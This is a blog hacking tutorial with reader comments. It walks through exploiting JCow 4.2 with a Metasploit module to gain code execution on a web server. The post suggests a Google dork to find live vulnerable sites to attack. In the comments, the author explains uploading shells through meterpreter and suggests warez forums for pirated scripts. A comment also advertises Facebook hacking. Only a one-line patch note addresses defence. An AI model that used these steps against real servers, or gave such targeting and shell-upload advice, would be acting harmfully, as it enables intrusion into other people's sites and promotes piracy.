4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
Type : Tutorial
Level : Medium
Victim Server : Windows XP SP3
Victim vulnerable application : JCow 4.2
Attacker O.S : Backtrack 5 R1
After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".
So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also 
) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim
Okay I hope you understand what I say above 
to make it more realistic, let's try the tutorial…
Requirement :
2. Jcow.rb exploit
Step by Step :
1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..
If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).
2. Open your Metasploit console and then use the exploit you just added before.
msf > use exploit/remote/jcow
3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).
msf exploit(jcow) > set rhost 192.168.8.94 --> set the target IP rhost => 192.168.8.94 msf exploit(jcow) > set username victim --> set the username username => victim msf exploit(jcow) > set password victim --> set the password password => victim msf exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here uri => jcow
Information :
Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.
4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.
PWNED!
Countermeasures :
1. Update your Jcow Social Networking into > v4.2
Hope you enjoyed…any question?just drop it below..
Incoming search terms:
- hack facebook
- Powered by Jcow
- Powered by Jcow 4 2 0
- jcow
- jcow full version
- hack jcow
- jcow hack
- hacking jcow
- backtrack 5 windows xp sp3 exploit completed but no connection
- jcow exploit
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
18 Responsesto “4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution”
Trackbacks/Pingbacks
- Hacking Jcow Social Networking Webserver - [...] Kebutuhan : 1. Metasploit Framework (metasploit.com) 2. Script exploit jcow.rb (link mediafire di website asalnya) [...]
- Hacking Jcow Social Networking Webserver « Belajar Bersama Ovhan - [...] Kebutuhan : 1. Metasploit Framework (metasploit.com) 2. Script exploit jcow.rb (link mediafire di website asalnya) [...]
Leave a Reply
Links
Get Updates via Networkedblogs
Nice tutorial!
Thanks for featuring our exploit.
http://www.exploit-db.com/exploits/17722/
#yehg
You’re welcome, btw thanks also for your exploit…next time when I write the tutorial, i’LL write a credit for the exploit maker
Cool. But how to upload some shell to the server? Didn't understand. Can help me, please?
#Varius
Actually when you’re inside a meterpreter you just need to run
shellcommand to turn into shell. And about how to upload some shell, maybe what you mean was about meterpreter file system command.Thanks for you reply! I''l read that tutorial mindfully. I'm not a hacker, just using this script on my site, One more question: this line 'Uploading the payload: /files/asgRk2.php' so, if I want to upload some shell into my site, using this exploit, for example, gnyshell.php, what command in metasploit should I use? Thanks in advance
#Varius
You can use meterpreter
uploadcommand..Thank u!
Good day! May I ask you one more question? What payload in metasploit should I use to start meterpreter? What steps do I miss? Because exploit connects to vulnerable script, than this message occurs "Exploit completed, but no session was created."
#Varius
There’s many payload you can use…. use
search meterpretercommand or you also can useshow payloadscommand.Thanks a lot! A very usefull info I found in this site! Y've helped me very much
#Varius
You’re welcome
If someone is interested here can learn about facebook hacking, potecting
facebook account, facebook security, hacking tutorials for begginers and something about facebook games.
if you are not interested in this skip the comment and sorry for disturbing.
http://hack-the-facebook.blogspot.com/
Dear Sir, I want your 1 help…please help me…I really in a problem…I want jcow professonal v7 plus [Full Version] free downloadable link….plz give me the link…Its my dream to start a social networking site..I am come from very poor family…plz help me plz….waiting for ur help….
#jjordan
You can search in a warez forum. They have much more resources for nulled scripts, web template and web engine…
Hi there I am so grateful I found your web site, I really found
you by accident, while I was researching on Bing for something else, Regardless I am here now and
would just like to say thanks a lot for a marvelous post and a all round thrilling blog (I also love the theme/design), I don’t have time to go through it all at the minute but I
have bookmarked it and also added in your RSS feeds, so when
I have time I will be back to read a lot more, Please
do keep up the great work.
I seriously love your blog.. Excellent colors & theme.
Did you make this website yourself? Please reply back as I’m trying to create my own personal blog and want to know where you got this from or exactly what the theme is named. Cheers!
Hello! Would you mind if I share your blog with my zynga group?
There’s a lot of people that I think would really enjoy your content. Please let me know. Thanks
#seo
Sure, as long as you put the link credit to this website without remove the copyright.